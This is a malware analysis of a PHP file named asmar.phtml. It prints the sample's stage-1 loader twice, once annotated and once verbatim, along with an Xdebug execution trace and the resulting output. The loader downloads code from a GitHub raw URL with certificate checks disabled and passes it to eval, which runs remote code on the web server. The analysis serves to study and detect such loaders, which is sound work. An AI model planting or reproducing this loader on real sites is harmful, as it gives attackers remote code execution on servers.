PHP Malware Analysis

asmar.phtml

md5: 846efc0bec6443a1201730b528174a34


Deobfuscated PHP code (stage-1 loader: fetches remote PHP over HTTPS with certificate checks disabled and passes the downloaded text straight to eval)

<?php

/**
 * Fetch a URL with cURL and return the response body as a string.
 *
 * Used by the loader at the bottom of this file to pull the second stage from
 * a remote host. Points an analyst should note:
 *  - TLS certificate and hostname verification are both switched off, so the
 *    download also succeeds against a spoofed or man-in-the-middle server.
 *  - Redirects are followed, so the final source of the code may differ from $url.
 *  - $GLOBALS['coki'] is never assigned anywhere in this file, so the cookie
 *    jar/file options receive NULL (visible in the execution trace below).
 *  - The HTTP status is never checked: an error page body such as
 *    "404: Not Found" is returned exactly like a successful download.
 *  - The cURL handle is never closed.
 *
 * @param string $url  Remote URL to fetch (the payload location chosen by the author).
 * @return string|false Response body, or false if curl_exec() fails.
 */
function get_contents($url)
{
    $ch = curl_init("{$url}");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // return the body instead of echoing it
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); // follow 3xx redirects
    // Hard-coded desktop browser User-Agent (Firefox 32 on Windows NT 6.1 / Windows 7),
    // presumably so the request looks like ordinary browser traffic.
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); // no certificate validation
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); // no hostname check
    curl_setopt($ch, CURLOPT_COOKIEJAR, $GLOBALS['coki']);  // 'coki' is undefined in this file -> NULL
    curl_setopt($ch, CURLOPT_COOKIEFILE, $GLOBALS['coki']); // same undefined global -> NULL
    $result = curl_exec($ch); // string body, or false on transport failure
    return $result;
}
// Stage-1 loader: download the second stage from a GitHub raw URL
// (IOC: github user "tuyulmama", repo "root", file xd.txt) and execute it.
$a = get_contents('https://raw.githubusercontent.com/tuyulmama/root/master/xd.txt');
// The leading '?>' leaves PHP mode, so the downloaded text is emitted as
// inline output until it opens its own '<?php' tag; any PHP inside the remote
// file then runs in this process with the web server's privileges.
// The remote file can be changed by its owner at any time, so this sample
// alone does not show what actually ran on a victim. In the trace below the
// URL returned "404: Not Found", so only that text was echoed and the real
// second stage was not captured. If the download fails outright, $a is false
// and eval('?>') is a no-op.
eval('?>' . $a);

Execution traces (Xdebug function trace, format 4, from a single run of the sample)

data/traces/846efc0bec6443a1201730b528174a34_trace-1676240032.5991.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:14:18.496909]
1	0	1	0.000165	393528
1	3	0	0.000260	398736	{main}	1		/var/www/html/uploads/asmar.phtml	0	0
2	4	0	0.000282	398736	get_contents	1		/var/www/html/uploads/asmar.phtml	15	1	'https://raw.githubusercontent.com/tuyulmama/root/master/xd.txt'
3	5	0	0.000316	398736	curl_init	0		/var/www/html/uploads/asmar.phtml	3	1	'https://raw.githubusercontent.com/tuyulmama/root/master/xd.txt'
3	5	1	0.000349	399680
3	5	R			resource(3) of type (curl)
2		A						/var/www/html/uploads/asmar.phtml	3	$ch = resource(3) of type (curl)
3	6	0	0.000396	399648	curl_setopt	0		/var/www/html/uploads/asmar.phtml	4	3	resource(3) of type (curl)	19913	1
3	6	1	0.000417	399744
3	6	R			TRUE
3	7	0	0.000433	399648	curl_setopt	0		/var/www/html/uploads/asmar.phtml	5	3	resource(3) of type (curl)	52	1
3	7	1	0.000455	399744
3	7	R			TRUE
3	8	0	0.000473	399648	curl_setopt	0		/var/www/html/uploads/asmar.phtml	6	3	resource(3) of type (curl)	10018	'Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0'
3	8	1	0.000498	399744
3	8	R			TRUE
3	9	0	0.000512	399648	curl_setopt	0		/var/www/html/uploads/asmar.phtml	7	3	resource(3) of type (curl)	64	0
3	9	1	0.000528	399744
3	9	R			TRUE
3	10	0	0.000542	399648	curl_setopt	0		/var/www/html/uploads/asmar.phtml	8	3	resource(3) of type (curl)	81	0
3	10	1	0.000558	399744
3	10	R			TRUE
3	11	0	0.000611	399624	curl_setopt	0		/var/www/html/uploads/asmar.phtml	9	3	resource(3) of type (curl)	10082	NULL
3	11	1	0.000641	399720
3	11	R			TRUE
3	12	0	0.000671	399624	curl_setopt	0		/var/www/html/uploads/asmar.phtml	10	3	resource(3) of type (curl)	10031	NULL
3	12	1	0.000696	399720
3	12	R			TRUE
3	13	0	0.000721	399624	curl_exec	0		/var/www/html/uploads/asmar.phtml	11	1	resource(3) of type (curl)
3	13	1	0.038967	399912
3	13	R			'404: Not Found'
2		A						/var/www/html/uploads/asmar.phtml	11	$result = '404: Not Found'
2	4	1	0.039166	398968
2	4	R			'404: Not Found'
1		A						/var/www/html/uploads/asmar.phtml	15	$a = '404: Not Found'
2	14	0	0.039223	399504	eval	1	'?>404: Not Found'	/var/www/html/uploads/asmar.phtml	16	0
2	14	1	0.039245	399504
1	3	1	0.039256	399096
			0.039301	318872
TRACE END   [2023-02-12 20:14:18.536079]


Generated HTML code (the string passed to eval was the remote server's "404: Not Found" body, so the run only echoed that text; the real second stage was not retrieved during this trace)

<html><head></head><body>404: Not Found</body></html>

Original PHP code (verbatim sample, left unmodified; this is the asmar.phtml file identified by the md5 above)

<?php
function get_contents($url){
  $ch = curl_init("$url");
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  curl_setopt($ch, CURLOPT_COOKIEJAR,$GLOBALS['coki']);
  curl_setopt($ch, CURLOPT_COOKIEFILE,$GLOBALS['coki']);
  $result = curl_exec($ch);
  return $result;
}

$a = get_contents('https://raw.githubusercontent.com/tuyulmama/root/master/xd.txt');
eval('?>'.$a);